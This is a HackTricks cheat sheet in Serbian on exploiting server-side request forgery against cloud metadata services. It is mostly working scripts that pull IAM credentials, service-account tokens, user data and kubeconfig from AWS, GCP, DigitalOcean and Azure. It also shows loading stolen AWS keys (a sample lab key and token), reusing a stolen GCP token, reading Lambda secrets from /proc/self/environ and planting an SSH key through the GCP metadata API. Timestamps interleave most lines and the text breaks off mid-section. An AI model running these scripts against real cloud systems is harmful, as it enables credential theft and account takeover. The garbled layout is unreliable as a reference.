2022-05-02 18:53:13 +00:00
# Cloud SSRF
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 13:11:20 +00:00
< summary > < strong > Naučite hakovanje AWS-a od nule do heroja sa< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2024-01-01 17:15:10 +00:00
2024-02-23 16:45:30 +00:00
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU** ](https://github.com/sponsors/carlospolop )!
2024-02-10 13:11:20 +00:00
* Nabavite [**zvanični PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-03-09 13:32:43 +00:00
* Otkrijte [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), našu kolekciju ekskluzivnih [**NFT-ova** ](https://opensea.io/collection/the-peass-family )
2024-02-23 16:45:30 +00:00
* **Pridružite se** 💬 [**Discord grupi** ](https://discord.gg/hRep4RUj7f ) ili [**telegram grupi** ](https://t.me/peass ) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-02-10 13:11:20 +00:00
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repozitorijume.
2022-04-28 16:01:33 +00:00
< / details >
2024-03-14 23:38:08 +00:00
**Try Hard Security Group**
2024-03-24 13:29:10 +00:00
< figure > < img src = "../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:38:08 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
2022-05-02 18:53:13 +00:00
## AWS
2022-04-28 16:01:33 +00:00
2024-02-10 13:11:20 +00:00
### Zloupotreba SSRF-a u AWS EC2 okruženju
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
**Metadata** endpoint može biti pristupačan sa bilo kog EC2 mašine i nudi zanimljive informacije o njoj. Dostupan je na url-u: `http://169.254.169.254` ([informacije o metapodacima ovde](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
2022-05-08 19:05:00 +00:00
2024-03-09 13:32:43 +00:00
Postoje **2 verzije** metadata endpointa. **Prva** verzija omogućava pristup endpointu putem **GET** zahteva (tako da ga bilo koji **SSRF može iskoristiti** ). Za **verziju 2** , [IMDSv2 ](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html ), morate zatražiti **token** slanjem **PUT** zahteva sa **HTTP zaglavljem** i zatim koristiti taj token za pristup metapodacima sa drugim HTTP zaglavljem (tako da je **komplikovanije zloupotrebiti** sa SSRF-om).
2022-05-08 19:05:00 +00:00
2023-08-28 09:09:07 +00:00
{% hint style="danger" %}
2024-03-24 13:29:10 +00:00
Imajte na umu da ako EC2 instanca primenjuje IMDSv2, [**prema dokumentaciji** ](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html ), **odgovor na PUT zahtev** će imati **limit preusmeravanja od 1** , što čini nemogućim pristup metapodacima EC2 iz kontejnera unutar EC2 instance.
2023-08-28 09:09:07 +00:00
2024-03-03 13:57:46 +00:00
Osim toga, **IMDSv2** će takođe **blokirati zahteve za dobijanje tokena koji uključuju zaglavlje `X-Forwarded-For`** . Ovo je kako bi se sprečilo da netačno konfigurisani obrnuti proxy serveri mogu pristupiti tome.
2023-08-28 09:09:07 +00:00
{% endhint %}
2022-06-02 13:49:01 +00:00
2024-03-09 13:32:43 +00:00
Možete pronaći informacije o [metadata endpointima u dokumentaciji ](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html ). U sledećem skriptu se dobijaju neke zanimljive informacije iz njega:
2022-05-08 19:05:00 +00:00
```bash
EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
URL="http://169.254.169.254/latest/meta-data"
aws_req=""
if [ "$(command -v curl)" ]; then
2024-02-10 13:11:20 +00:00
aws_req="curl -s -f -H '$HEADER'"
2022-05-08 19:05:00 +00:00
elif [ "$(command -v wget)" ]; then
2024-02-10 13:11:20 +00:00
aws_req="wget -q -O - -H '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
2022-05-08 19:05:00 +00:00
fi
2022-09-01 11:07:00 +00:00
printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
2022-05-11 10:13:29 +00:00
echo "Account Info"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
eval $aws_req "http://169.254.169.254/latest/dynamic/instance-identity/document"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
2022-05-11 10:13:29 +00:00
echo "Network Info"
2024-02-10 13:11:20 +00:00
for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
echo "Mac: $mac"
printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
echo ""
2022-05-08 19:05:00 +00:00
done
echo ""
2022-05-11 10:13:29 +00:00
echo "IAM Role"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/iam/info"
2024-02-10 13:11:20 +00:00
for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
echo "Role: $role"
eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
echo ""
2022-05-08 19:05:00 +00:00
done
echo ""
2022-05-11 10:13:29 +00:00
echo "User Data"
2022-05-08 19:05:00 +00:00
# Search hardcoded credentials
2022-09-01 11:07:00 +00:00
eval $aws_req "http://169.254.169.254/latest/user-data"
2022-10-28 09:19:40 +00:00
echo ""
echo "EC2 Security Credentials"
eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
2022-02-13 12:30:13 +00:00
```
2024-03-24 13:29:10 +00:00
Kao primer izloženih **javno dostupnih IAM akreditiva** možete posetiti: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws ](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws )
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
Takođe možete proveriti javne **EC2 bezbednosne akreditive** na: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance ](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance )
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
Zatim možete **koristiti te akreditive sa AWS CLI** . To će vam omogućiti da radite **sve što ta uloga ima dozvolu da radi** .
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
Da biste iskoristili nove akreditive, moraćete da kreirate novi AWS profil kao ovaj:
2022-02-13 12:30:13 +00:00
```
[profilename]
aws_access_key_id = ASIA6GG7PSQG4TCGYYOU
aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC
aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw=
```
2024-03-24 12:28:49 +00:00
Primetite **aws\_session\_token** , to je neophodno da bi profil radio.
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
[**PACU** ](https://github.com/RhinoSecurityLabs/pacu ) se može koristiti sa otkrivenim pristupnim podacima da biste saznali vaše privilegije i pokušali da eskalirate privilegije
2022-02-13 12:30:13 +00:00
2024-02-23 16:45:30 +00:00
### SSRF u AWS ECS (Container Service) pristupnim podacima
2022-02-13 12:30:13 +00:00
2024-03-14 23:38:08 +00:00
**ECS**, je logička grupa EC2 instanci na kojima možete pokrenuti aplikaciju bez potrebe da skalirate svoju sopstvenu infrastrukturu za upravljanje klasterima jer ECS to upravlja umesto vas. Ako uspete da kompromitujete servis koji se izvršava u **ECS** , **metadata endpointi se menjaju** .
2022-02-13 12:30:13 +00:00
2024-02-23 16:45:30 +00:00
Ako pristupite _**http://169.254.170.2/v2/credentials/\<GUID>**_ pronaći ćete pristupne podatke ECS mašine. Ali prvo morate **pronaći \<GUID>** . Da biste pronašli \<GUID> morate pročitati **environ** promenljivu **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI** unutar mašine.\
2024-02-10 13:11:20 +00:00
Možda ćete moći da je pročitate eksploatišući **Path Traversal** do `file:///proc/self/environ` \
2024-02-23 16:45:30 +00:00
Pomenuta http adresa trebalo bi da vam pruži **AccessKey, SecretKey i token** .
2022-02-13 12:30:13 +00:00
```bash
2022-06-02 12:02:53 +00:00
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
2022-02-13 12:30:13 +00:00
```
2022-06-01 15:39:15 +00:00
{% hint style="info" %}
2024-02-23 16:45:30 +00:00
Imajte na umu da u **nekim slučajevima** možete pristupiti **EC2 metapodacima** iz kontejnera (proverite ograničenja IMDSv2 TTL navedena ranije). U ovim scenarijima iz kontejnera možete pristupiti i ulozi IAM kontejnera i ulozi EC2.
2022-06-01 15:39:15 +00:00
{% endhint %}
2024-02-10 13:11:20 +00:00
### SSRF za AWS Lambda <a href="#id-6f97" id="id-6f97"></a>
2022-05-11 11:17:22 +00:00
2024-03-14 23:38:08 +00:00
U ovom slučaju, **poverljivi podaci se čuvaju u env promenljivama** . Dakle, da biste im pristupili, morate pristupiti nečemu poput ** `file:///proc/self/environ` **.
2022-07-27 16:08:17 +00:00
2024-03-14 23:38:08 +00:00
**Nazivi** zanimljivih env promenljivih su:
2022-07-27 16:08:17 +00:00
* `AWS_SESSION_TOKEN`
* `AWS_SECRET_ACCESS_KEY`
* `AWS_ACCES_KEY_ID`
2024-03-24 13:29:10 +00:00
Pored IAM podataka, Lambda funkcije takođe imaju **podatke događaja koji se prosleđuju funkciji prilikom pokretanja** . Ovi podaci su dostupni funkciji putem [interfejsa za izvršavanje ](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html ) i mogu sadržati **poverljive informacije** (kao unutar **stageVariables** ). Za razliku od IAM podataka, ovi podaci su dostupni putem standardnog SSRF-a na ** `http://localhost:9001/2018-06-01/runtime/invocation/next` **.
2022-05-11 11:17:22 +00:00
2022-06-02 16:20:19 +00:00
{% hint style="warning" %}
2024-03-24 13:29:10 +00:00
Imajte na umu da su **Lambda poverljivi podaci** unutar **env promenljivih** . Dakle, ako **stek trag** koda lambda funkcije štampa env promenljive, moguće je **izvući ih izazivajući grešku** u aplikaciji.
2022-06-02 16:20:19 +00:00
{% endhint %}
2024-02-10 13:11:20 +00:00
### SSRF URL za AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a>
2022-02-13 12:30:13 +00:00
2024-02-23 16:45:30 +00:00
Dobijamo `accountId` i `region` iz API-ja.
2022-02-13 12:30:13 +00:00
```
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
2024-03-24 12:28:49 +00:00
Zatim dobijamo `AccessKeyId` , `SecretAccessKey` i `Token` sa API-ja.
2022-02-13 12:30:13 +00:00
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
![](https://miro.medium.com/max/60/0\*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0\*4OG-tRUNhpBK96cL)
2024-02-10 13:11:20 +00:00
Zatim koristimo pristupne podatke sa `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/` .
2022-02-13 12:30:13 +00:00
2024-01-22 12:24:45 +00:00
## GCP <a href="#id-6440" id="id-6440"></a>
2022-05-02 18:53:13 +00:00
2024-02-10 13:11:20 +00:00
Možete [**ovde pronaći dokumentaciju o krajnjim tačkama metapodataka** ](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata ).
2022-02-13 12:30:13 +00:00
2024-02-10 13:11:20 +00:00
### SSRF URL za Google Cloud <a href="#id-6440" id="id-6440"></a>
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
Potreban je HTTP zaglavlje ** `Metadata-Flavor: Google` ** i možete pristupiti krajnjoj tački metapodataka sa sledećim URL-ovima:
2022-02-13 12:30:13 +00:00
2022-02-16 09:28:48 +00:00
* http://169.254.169.254
* http://metadata.google.internal
* http://metadata
2022-02-13 12:30:13 +00:00
2024-02-23 16:45:30 +00:00
Interesantne tačke za izvlačenje informacija:
2022-02-16 09:28:48 +00:00
```bash
# /project
2022-05-01 12:41:36 +00:00
# Project name and number
2024-02-23 16:45:30 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
2022-05-01 12:41:36 +00:00
# Project attributes
2024-02-23 16:45:30 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/attributes/?recursive=true
2022-02-16 09:28:48 +00:00
# /oslogin
2022-05-01 12:41:36 +00:00
# users
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/users
2022-05-01 12:41:36 +00:00
# groups
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/groups
2022-05-01 12:41:36 +00:00
# security-keys
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/security-keys
2022-05-01 12:41:36 +00:00
# authorize
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/authorize
2022-02-16 09:28:48 +00:00
# /instance
2022-05-01 12:41:36 +00:00
# Description
2024-02-23 16:45:30 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
2022-05-01 12:41:36 +00:00
# Hostname
2024-02-23 16:45:30 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
2022-05-01 12:41:36 +00:00
# ID
2024-02-23 16:45:30 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
2022-05-01 12:41:36 +00:00
# Image
2024-02-23 16:45:30 +00:00
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
2022-05-01 12:41:36 +00:00
# Machine Type
2024-02-23 16:45:30 +00:00
curl -s -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/machine-type
2022-05-01 12:41:36 +00:00
# Name
2024-02-23 16:45:30 +00:00
curl -s -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/name
2022-05-01 12:41:36 +00:00
# Tags
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/scheduling/tags
2022-05-01 12:41:36 +00:00
# Zone
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/zone
2023-01-24 14:43:15 +00:00
# User data
curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
2022-05-01 12:41:36 +00:00
# Network Interfaces
2024-02-10 13:11:20 +00:00
for iface in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do
echo " IP: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
echo " Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
echo " Gateway: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
echo " DNS: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
echo " Network: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
echo " ============== "
2022-02-16 09:28:48 +00:00
done
2022-05-01 12:41:36 +00:00
# Service Accounts
2024-02-10 13:11:20 +00:00
for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
echo " Name: $sa"
echo " Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
echo " Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
echo " Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
echo " Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
echo " Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
echo " ============== "
2022-02-16 09:28:48 +00:00
done
2022-05-01 12:41:36 +00:00
# K8s Attributtes
## Cluster location
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
2022-05-01 12:41:36 +00:00
## Cluster name
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
2022-05-01 12:41:36 +00:00
## Os-login enabled
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
2022-05-01 12:41:36 +00:00
## Kube-env
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kube-env
2022-05-01 12:41:36 +00:00
## Kube-labels
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
2022-05-01 12:41:36 +00:00
## Kubeconfig
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig
2023-02-19 18:39:32 +00:00
# All custom project attributes
curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true& alt=text" \
2024-02-10 13:11:20 +00:00
-H "Metadata-Flavor: Google"
2023-02-19 18:39:32 +00:00
# All custom project attributes instance attributes
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true& alt=text" \
2024-02-10 13:11:20 +00:00
-H "Metadata-Flavor: Google"
2022-02-13 12:30:13 +00:00
```
2024-02-23 16:45:30 +00:00
Beta trenutno NE zahteva zaglavlje (hvala Mathias Karlsson @avlidienbrunn )
2022-02-13 12:30:13 +00:00
```
http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
2023-01-20 15:45:29 +00:00
{% hint style="danger" %}
2024-03-24 13:29:10 +00:00
Da biste **koristili ukradeni token naloga za usluge** , jednostavno uradite sledeće:
2023-01-20 15:45:29 +00:00
```bash
# Via env vars
export CLOUDSDK_AUTH_ACCESS_TOKEN=< token >
2023-01-25 11:53:16 +00:00
gcloud projects list
2023-01-20 15:45:29 +00:00
# Via setup
echo "< token > " > /some/path/to/token
gcloud config set auth/access_token_file /some/path/to/token
2023-01-25 11:53:16 +00:00
gcloud projects list
2023-01-22 18:27:01 +00:00
gcloud config unset auth/access_token_file
2023-01-20 15:45:29 +00:00
```
{% endhint %}
2024-03-24 13:29:10 +00:00
### Dodavanje SSH ključa <a href="#id-3e24" id="id-3e24"></a>
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
Izvucite token
2022-02-13 12:30:13 +00:00
```
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
```
2024-02-23 16:45:30 +00:00
Proverite opseg tokena (sa prethodnim izlazom ili pokretanjem sledećeg)
```bash
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA {
2024-02-10 13:11:20 +00:00
"issued_to": "101302079XXXXX",
"audience": "10130207XXXXX",
"scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring",
"expires_in": 2443,
"access_type": "offline"
2022-02-13 12:30:13 +00:00
}
```
2024-03-09 13:32:43 +00:00
Sada gurnite SSH ključ.
2022-02-13 12:30:13 +00:00
2023-05-10 14:04:00 +00:00
{% code overflow="wrap" %}
2023-01-20 15:45:29 +00:00
```bash
2024-02-10 13:11:20 +00:00
curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata"
-H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA"
-H "Content-Type: application/json"
2022-02-13 12:30:13 +00:00
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
```
2023-05-10 14:04:00 +00:00
{% endcode %}
2022-02-13 12:30:13 +00:00
2024-03-03 13:57:46 +00:00
### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a>
2024-02-23 16:45:30 +00:00
2024-03-24 13:29:10 +00:00
Metadata endpoint radi na isti način kao i kod virtuelnih mašina, ali bez nekih endpointa:
2024-02-23 16:45:30 +00:00
```bash
# /project
# Project name and number
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
# /instance
# ID
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
# Zone
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/zone
# Auto MTLS config
curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration
# Service Accounts
for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
echo " Name: $sa"
echo " Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
echo " Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
echo " Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
echo " Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
echo " Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
echo " ============== "
done
```
2024-01-22 12:24:45 +00:00
## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
2022-02-13 12:30:13 +00:00
2022-12-13 22:52:41 +00:00
{% hint style="warning" %}
2024-03-24 13:29:10 +00:00
Nema stvari poput AWS uloga ili GCP servisnog naloga, stoga nemojte očekivati da pronađete metapodatke bot kredencijala
2022-12-13 22:52:41 +00:00
{% endhint %}
2024-02-10 13:11:20 +00:00
Dokumentacija dostupna na [`https://developers.digitalocean.com/documentation/metadata/` ](https://developers.digitalocean.com/documentation/metadata/ )
2022-02-13 12:30:13 +00:00
```
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
2024-02-10 13:11:20 +00:00
http://169.254.169.254/metadata/v1/
2022-02-13 12:30:13 +00:00
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
curl http://169.254.169.254/metadata/v1.json | jq
```
2022-05-02 18:53:13 +00:00
## Azure <a href="#cea8" id="cea8"></a>
2022-02-13 12:30:13 +00:00
2022-09-25 18:26:29 +00:00
### Azure VM
2022-02-13 12:30:13 +00:00
2024-02-10 13:11:20 +00:00
[**Dokumentacija** ovde ](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=linux ).
2022-02-13 12:30:13 +00:00
2024-03-24 12:28:49 +00:00
* **Mora** sadržati zaglavlje `Metadata: true`
* Ne sme sadržati zaglavlje `X-Forwarded-For`
2023-05-10 14:04:00 +00:00
```bash
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn .microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
echo "Instance details"
curl -s -f -H "$HEADER" "$URL/instance?api-version=$API_VERSION"
echo "Load Balancer details"
curl -s -f -H "$HEADER" "$URL/loadbalancer?api-version=$API_VERSION"
echo "Management Token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION& resource=https://management.azure.com/"
echo "Graph token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION& resource=https://graph.microsoft.com/"
echo "Vault token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION& resource=https://vault.azure.net/"
echo "Storage token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION& resource=https://storage.azure.com/"
```
{% endcode %}
{% endtab %}
{% tab title="PS" %}
```bash
2022-09-25 18:26:29 +00:00
# Powershell
Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64
2022-10-30 18:21:55 +00:00
## User data
